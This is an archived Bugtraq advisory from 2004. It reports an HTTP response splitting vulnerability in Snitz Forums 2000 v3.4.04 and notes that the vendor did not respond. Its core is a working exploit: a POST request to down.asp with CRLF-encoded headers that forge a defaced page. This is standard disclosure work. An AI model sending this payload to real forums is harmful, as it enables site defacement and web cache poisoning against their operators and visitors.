[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

ADVISORY: security hole (http response splitting) in snitz forums 2000

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ADVISORY: security hole (http response splitting) in snitz forums 2000
From: "Maestro De-Seguridad" <maestrodeseguridad@xxxxxxxxx>
Date: Thu, 16 Sep 2004 10:00:23 -0500

ADVISORY
 
Author: Maestro (me!)
 
Date: 16-SEP-04
 
Vendor: Snitz Communications (www.snitz.com)
 
Product: Snitz Forums 2000 v3.4.04

Product description: (from vendor website) "the leading ASP forum/bbs on the 
internet today"

Problem: Http response splitting (web cache poisoning, xss, 
yadayadayada) - 
http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
 
Exploit:

POST /down.asp HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 134

location=/foo?%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%2014%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}defaced{/html}

(replace curly braces with lessthan and greaterthan)

Vendor status: vendor contacted several times (email to support@ and to the 
contact email in the code). No response from vendor.


-- 
_______________________________________________
Find what you are looking for with the Lycos Yellow Pages
http://r.lycos.com/r/yp_emailfooter/http://yellowpages.lycos.com/default.asp?SRC=lycos10

Prev by Date: wp-04-0001: Multiple Browser Cookie Injection Vulnerabilities
Next by Date: Microsoft WordPerfect 5.x Converter Heap Overflow
Previous by thread: wp-04-0001: Multiple Browser Cookie Injection Vulnerabilities
Next by thread: Microsoft WordPerfect 5.x Converter Heap Overflow
Index(es):
- Date
- Thread